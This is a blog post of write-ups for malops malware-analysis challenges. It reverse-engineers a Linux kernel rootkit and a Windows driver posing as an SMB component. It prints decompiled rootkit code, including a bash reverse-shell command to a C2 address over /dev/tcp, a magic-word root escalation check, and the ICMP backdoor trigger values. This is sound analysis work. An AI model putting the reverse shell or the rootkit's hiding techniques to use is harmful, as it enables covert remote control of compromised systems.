The publication date of this post reflects the initial version; I will probably split this up in the future.
The malops platform is a collection of reverse engineering challenges targeting realistic malware scenarios. By providing a sample and a series of analysis questions, players are challenged to dive into real-world malware samples.
That’s exactly the right formula to get me hooked. To structure my progress while I make my way through the challenges and satisfy my inner completionist, I will be collecting write-ups below.
So far, the page below contains the following challenges (in order of completion):
This is a challenge in the rootkit category. We’re supplied with a file called singularity.ko; a Linux kernel driver. The challenge suggests to use IDA Pro, which means I’ll be using Binary Ninja.
“What is the SHA256 hash of the sample?”
We simply call sha256sum. The hash is 0b8ecdaccf492000f3143fa209481eb9db8c0a29da2b79ff5b7f6e84bb3ac7c8
“What is the name of the primary initialization function called when the module is loaded?”
Historically, the standard way was to implement init_module. More recent kernels define the module_init macro, which wraps a driver’s custom initialization function and defines it as an alias of init_module. The compiler appears to have flattened it back down to init_module.
“How many distinct feature-initialization functions are called within above mentioned function?”
The function looks as follows:
004052b0 int64_t init_module()
004052b0 endbr64
004052b4 call __fentry__
004052b9 push rbx {__saved_rbx}
004052ba call reset_tainted_init
004052bf mov ebx, eax
004052c1 call hiding_open_init
004052c6 or ebx, eax
004052c8 call become_root_init
004052cd or ebx, eax
004052cf call hiding_directory_init
004052d4 or ebx, eax
004052d6 call hiding_stat_init
004052db or ebx, eax
004052dd call hiding_tcp_init
004052e2 or ebx, eax
004052e4 call hooking_insmod_init
004052e9 or ebx, eax
004052eb call clear_taint_dmesg_init
004052f0 or ebx, eax
004052f2 call hooks_write_init
004052f7 or ebx, eax
004052f9 call hiding_chdir_init
004052fe or ebx, eax
00405300 call hiding_readlink_init
00405305 or ebx, eax
00405307 call bpf_hook_init
0040530c or ebx, eax
0040530e call hiding_icmp_init
00405313 or ebx, eax
00405315 call trace_pid_init
0040531a or ebx, eax
0040531c call module_hide_current
00405321 mov eax, ebx
00405323 pop rbx {__saved_rbx}
00405324 jmp __x86_return_thunk
We simply count the call operations, excluding the call to __fentry__; there are fifteen initialization functions.
“The reset_tainted_init function creates a kernel thread for anti-forensics. What is the hardcoded name of this thread?”
The reset_tainted_init function contains the following snippet:
004000aa void* rax_2 = kthread_create_on_node(
004000aa singularity_exit, 0, 0xffffffff,
004000aa "zer0t")
The last argument of kthread_create_on_node is the thread’s name, so the answer is zer0t
“The add_hidden_pid function has a hardcoded limit. What is the maximum number of PIDs the rootkit can hide?”
The following conditional in add_hidden_pid tells us when the loop breaks:
004027bc else if (hidden_count_1 != 0x20)
004027ca break
The limit is 0x20, which is 32 in decimal.
“What is the name of the function called last within init_module to hide the rootkit itself?”
Refer to question 2; it’s module_hide_current
“The TCP port hiding module is initialized. What is the hardcoded port number it is configured to hide (decimal)?”
We look at functions related to TCP for this. hiding_tcp_init installs a number of hooks, one of which is hooked_tcp4_seq_show. The latter contains the following conditional. For clarity, we set the type of v to struct sock*.
00400d7b if (v->__offset(0x318).d
00400d7b != in_aton("192.168.5.128")
00400d7b && v->__sk_common..skc_addrpair.d
00400d7b != in_aton("192.168.5.128")
00400d7b && v->__offset(0x31e).w != 0xa146
00400d7b && v->__sk_common..skc_portpair.w
00400d7b != 0xa146)
The port number is 0xa146, but it is important to note that skc_portpair.w is a word in little-endian representation. To compute the decimal, we must thus swap the bytes. We get 0x46a1, which is 18081.
“What is the hardcoded “magic word” string, checked for by the privilege escalation module?”
The “privilege escalation module appears to refer to become_root_init. This function installs a series of hooks starting from 0x0040aa10. Turning the data at that address into an array of ftrace_hook objects helps with readability somewhat.
We page through the installed hooks, and in hook_getuid we observe the following:
004002e2 if (strstr(i_1, "MAGIC=babyelephant") != 0)
004002e4 int64_t rax_5 = prepare_creds()
It appears the magic word is babyelephant.
“How many hooks, in total, does the become_root_init function install to enable privilege escalation?”
We see a singular call to fh_install_hooks. The second argument is the number of hooks: 0xa, or decimal 10.
“What is the hardcoded IPv4 address of the C2 server?”
See the snippet for question 7; 192.168.5.128. This IP also occurs in functions such as hooked_tpacket_rcv where the network traffic is hidden, and in hook_icmp_rcv and spawn_revshell where the actual connection is established.
“What is the hardcoded port number the C2 server listens on?”
It’s listening for a reverse shell connection by spawn_revshell; this function builds the following command string:
004048eb snprintf(&cmd, 0x300,
004048eb "bash -c 'PID=$$; kill -59 $PID; exec -a "%s" "
004048eb "/bin/bash &>/dev/tcp/%s/%s 0>&1' &",
004048eb "firefox-updater", "192.168.5.128", "443")
It establishes a TCP connection to 192.168.5.128 at port 443.
“What network protocol is hooked to listen for the backdoor trigger?”
That’s what’s happening in hook_icmp_rcv; the protocol we’re looking for is ICMP.
“What is the “magic” sequence number that triggers the reverse shell (decimal)?”
I’ve not dissected the packet structure in detail, but the following comparison seems to give it away:
00404ae5. if (head != neg.q(rax_6) &&
00404ae5. in4_pton("192.168.5.128", 0xffffffff, &trigger_ip, 0xffffffff, 0) != 0
00404ae5. && *(rax_3 + 0xc) == trigger_ip && *rdx_3 == 8
00404ae5. && *(rdx_3 + 6) == 0xcf07)
The magic number is 0xcf07. Again we interpret this as little-endian, converting to 0x07cf which is 1999 in decimal.
“When the trigger conditions are met, what is the name of the function queued to execute the reverse shell?”
Right below the condition from question 13, we find:
00404b3f if (rax_9 != 0)
00404b4f rax_9[3] = spawn_revshell
00404b5c int64_t rsi_2 = *system_wq
00404b63 *rax_9 = 0xfffffffe00000
00404b6a rax_9[1] = &rax_9[1]
00404b6e rax_9[2] = &rax_9[1]
00404b72 queue_work_on(0x2000, rsi_2)
The function is clearly named: spawn_revshell.
“The spawn_revshell function launches a process. What is the hardcoded process name it uses for the reverse shell?”
We refer to the command in question 11; the process name is supplied using the -a flag of the exec command: firefox-updater.
Continuing in the rootkit category, we’re given a single sample file. As we’ll see shortly, this is a Windows driver.
“What is the SHA256 of this sample?”
Running sha256sum gives us 980954a2440122da5840b31af7e032e8a25b0ce43e071ceb023cca21cedb2c43
“What type of executable is this sample?”
This one had me stumped for a while. The answer format suggests we’re looking for six characters, so PE32 or PE is out. I tried native, but that was wrong.
After asking on the Malops Discord to verify whether the answer format was correct, I was told to look at the IMAGE_OPTIONAL_HEADER. Searching for a six character word let me to the DllCharacteristics flags — one of which is WDM_DRIVER. This indicates that the file is a Windows driver that uses the Windows Driver Model.
“This sample attempts to masquerade as a component of the system. Which system component is it attempting to masquerade as?”
The FileDescription field of the Version resource tells us that the file is the Windows NT SMB Manager. We can browse the file resources using tools such as Detect-It-Easy.
“What is the Original Filename of the sample?”
The OriginalFilename field is also part of a PE file’s Version resource. The original filename of this sample is mrxsmbmg.sys.
“This sample only runs on one type of system architecture, which one?”
This is a 32-bit driver and Windows provides no compatibility layer for drivers, so this sample only runs on 32-bit systems.
“This is targeted at specific versions of the Windows operating system. Which version of Windows will this sample not run on?”
In _start, we find the following snippet that retrieves and checks the system version:
00010d29 PsGetVersion(&var_8, &var_c, 0, 0)
00010d29 ...
00010d33 if (var_8 u<= 5)
The MajorVersion is written to var_8; the _start function only continues if it’s 5 or less. That’s remarkable, as the IMAGE_OPTIONAL_HEADER specifies a MajorOperatingSystemVersion requirement of 6.
“What Windows API does the sample use to execute the main function via Thread?”
After the OS check was passed and a memory pool was allocated, the _start function builds a Thread context and calls PsCreateSystemThread on line 00010dd7. Notably, it passes a handle to sub_10afc as the StartRoutine argument.
“With the goal of obfuscating certain capabilities, the sample implements an algorithm for decrypting strings at runtime. What is the seed of this algorithm?”
In sub_10afc we find a couple references to sub_11524; the first argument is a constant, and the second is a reference to an address in the .data section. Looking at the chunks of data at those addresses, we identify several sequences of data separated by null bytes. Indeed, when we check the cross references to the start of these sequences, we find more references to sub_11524. Presumably this is the string deobfuscation routine.
The stack variables in sub_10afc are not identified correctly, as Binary Ninja does not seem to recognize sub_12860 and sub_1289b as SEH prolog/epilog. The binary was compiled using Visual Studio 2005, of which the output differs slightly from modern compilers. Binary Ninja currently does not implement this, but manually marking the functions as ‘inline’ serves as a workaround.
Inside sub_11524, we find some buffer manipulation and a reference to sub_11432. This is where the magic happens:
00011456 if (result s> 0)
00011475 do
0001145e state = state * 0x19660d + 0x3c6ef35f
0001146e buffer[ecx_1] ^= (state u>> 0x10).w | 0x8000
00011472 ecx_1 += 1
00011475 while (ecx_1 s< result)
That’s an LCG! Tracing the function arguments, we see that the first argument of sub_11524 is passed to sub_11432 as its first argument as well. This is the LCG seed; 0xaa107fb.
Interestingly, there are two instances of data deobfuscation going on. The function described above operates on words, while the LCG at sub_11432 operates on bytes. Indeed, the encrypted strings from 0x12f20 onwards are separated by singular null bytes rather than null-words.
“What are the first three strings (in order) that were decrypted?”
Alas, a question where dynamic analysis is probably much more convenient. That requires firing up a Windows VM, though. We can use the Binary Ninja API and a bit of Python, instead:
def decrypt_string(addr):
state = 0xAA107FB
output = ""
while True:
data = int.from_bytes(bv.read(addr, 2), byteorder="little")
addr += 2
if data == 0:
break
state = (state * 0x19660D + 0x3C6EF35F) & 0xFFFFFFFF
output += chr(data ^ ((state >> 0x10) | 0x8000))
return output
print(decrypt_string(0x12eb0))
print(decrypt_string(0x12e9c))
print(decrypt_string(0x12ecc))
The fact that it operates on words tripped me up when implementing the above, and I ended up using unicorn with udbserver and gdbgui to trace what was going on. At that point the debugger showed the strings, but I was already too far down the static analysis rabbit hole to accept defeat.
We can use the Binary Ninja API as follows to quickly rename the strings accordingly; the first three strings are services.exe, lsass.exe and winlogon.exe.
bv.define_user_data_var(here, bv.get_data_var_at(here).type,
decrypt_string_8(here))
Purely out of curiosity, the other strings in the .data section encrypted using the 2-byte LCG are msvcp73.dll and Kernel32.dll. The single-byte LCG was used to encrypt the names of memory allocation and thread related API calls: VirtualFree, LoadLibraryW, KeAttachProcess, KeDetachProcess, ZwAllocateVirtualMemory, ZwFreeVirtualMemory, KeInitializeApc, and KeInsertQueueApc.